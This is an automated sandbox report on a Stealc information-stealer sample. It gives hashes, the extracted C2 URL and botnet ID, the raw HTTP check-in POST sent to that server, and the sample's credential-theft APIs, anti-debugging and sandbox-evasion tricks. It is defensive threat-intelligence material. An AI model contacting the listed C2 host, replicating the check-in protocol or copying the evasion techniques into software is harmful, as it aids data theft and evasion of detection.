Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523774
MD5:5cace3141ff06d98c584bfb6681a8ae3
SHA1:0993adfa0a320e79a33495bd92c2f457714cca95
SHA256:34e912b828576002110972ce8292a94d4ecebb1582816dcb1414ea2f334827aa
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6792 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5CACE3141FF06D98C584BFB6681A8AE3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6792JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6792JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.1c0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T02:01:04.104690+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.1c0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpkVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/iVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/(Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php=Virustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_001CC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_001C7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_001C9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_001C9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001D8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001D38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001D4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_001CDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_001CE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_001CED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001D4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_001CBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001CF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001D3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001C16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 45 41 37 34 30 37 41 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"4BBEA7407A6F1350827015------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build"doma------DBFHDBGIEBFIIDGCBFBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_001C4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 45 41 37 34 30 37 41 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"4BBEA7407A6F1350827015------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build"doma------DBFHDBGIEBFIIDGCBFBK--
                Source: file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747423410.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/(
                Source: file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
                Source: file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4
                Source: file.exe, 00000000.00000002.1747423410.0000000000E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpk
                Source: file.exe, 00000000.00000002.1747423410.0000000000E86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/i
                Source: file.exe, 00000000.00000002.1747423410.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B0010_2_0059B001
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005960310_2_00596031
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050F8C00_2_0050F8C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008561C30_2_008561C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059298B0_2_0059298B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579ADD0_2_00579ADD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537AFC0_2_00537AFC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00591AB90_2_00591AB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00655B6A0_2_00655B6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FA3660_2_004FA366
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A030D0_2_005A030D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00618B3B0_2_00618B3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064CC660_2_0064CC66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059444A0_2_0059444A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059EC670_2_0059EC67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054D4F80_2_0054D4F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055BCF90_2_0055BCF9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049748B0_2_0049748B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059CC870_2_0059CC87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DD620_2_0051DD62
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD50B0_2_004FD50B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005995900_2_00599590
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A1E410_2_005A1E41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EAE9D0_2_004EAE9D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001C45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: epsygglv ZLIB complexity 0.9947550107099143
                Source: file.exe, 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705421415.0000000004B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001D9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_001D3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\JL6S8V7G.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1829888 > 1048576
                Source: file.exeStatic PE information: Raw size of epsygglv is bigger than: 0x100000 < 0x198800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;epsygglv:EW;ncsgechg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;epsygglv:EW;ncsgechg:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cd510 should be: 0x1bf108
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: epsygglv
                Source: file.exeStatic PE information: section name: ncsgechg
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065E047 push 0DB9FF09h; mov dword ptr [esp], edi0_2_0065E04F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065E047 push ebx; mov dword ptr [esp], edx0_2_0065E06D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DB035 push ecx; ret 0_2_001DB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push esi; mov dword ptr [esp], 19FA6CA4h0_2_005BE849
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push eax; mov dword ptr [esp], ecx0_2_005BE8BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push eax; mov dword ptr [esp], edi0_2_005BE8EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BE81B push edx; mov dword ptr [esp], ecx0_2_005BE938
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push 37069DFFh; mov dword ptr [esp], ecx0_2_006588B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push edx; mov dword ptr [esp], 3BFB14EFh0_2_006589AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push ebx; mov dword ptr [esp], ecx0_2_00658A09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push 4F3373E3h; mov dword ptr [esp], ecx0_2_00658A36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065882E push edx; mov dword ptr [esp], esp0_2_00658A6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 693BACF6h; mov dword ptr [esp], eax0_2_0059B02C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 3ED43B63h; mov dword ptr [esp], edx0_2_0059B090
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push esi; mov dword ptr [esp], ecx0_2_0059B154
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edx; mov dword ptr [esp], ebx0_2_0059B164
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edi; mov dword ptr [esp], edx0_2_0059B16D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push esi; mov dword ptr [esp], eax0_2_0059B265
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edx; mov dword ptr [esp], 7B7F4412h0_2_0059B2FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 7CF7AF81h; mov dword ptr [esp], eax0_2_0059B372
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 5EF16101h; mov dword ptr [esp], edx0_2_0059B3F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push eax; mov dword ptr [esp], edi0_2_0059B41C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push ebp; mov dword ptr [esp], esi0_2_0059B450
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push eax; mov dword ptr [esp], ebx0_2_0059B4C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 062C0500h; mov dword ptr [esp], ebp0_2_0059B501
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edi; mov dword ptr [esp], esi0_2_0059B518
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push edx; mov dword ptr [esp], eax0_2_0059B574
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 58416877h; mov dword ptr [esp], ecx0_2_0059B59B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 48D37672h; mov dword ptr [esp], ecx0_2_0059B5E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push 65130D40h; mov dword ptr [esp], edi0_2_0059B64D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059B001 push ebx; mov dword ptr [esp], ecx0_2_0059B682
                Source: file.exeStatic PE information: section name: epsygglv entropy: 7.95332225365963

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001D9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13611
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422466 second address: 42246A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42246A second address: 422470 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422470 second address: 422477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A778D second address: 5A7793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A69D5 second address: 5A69DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A69DB second address: 5A69E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
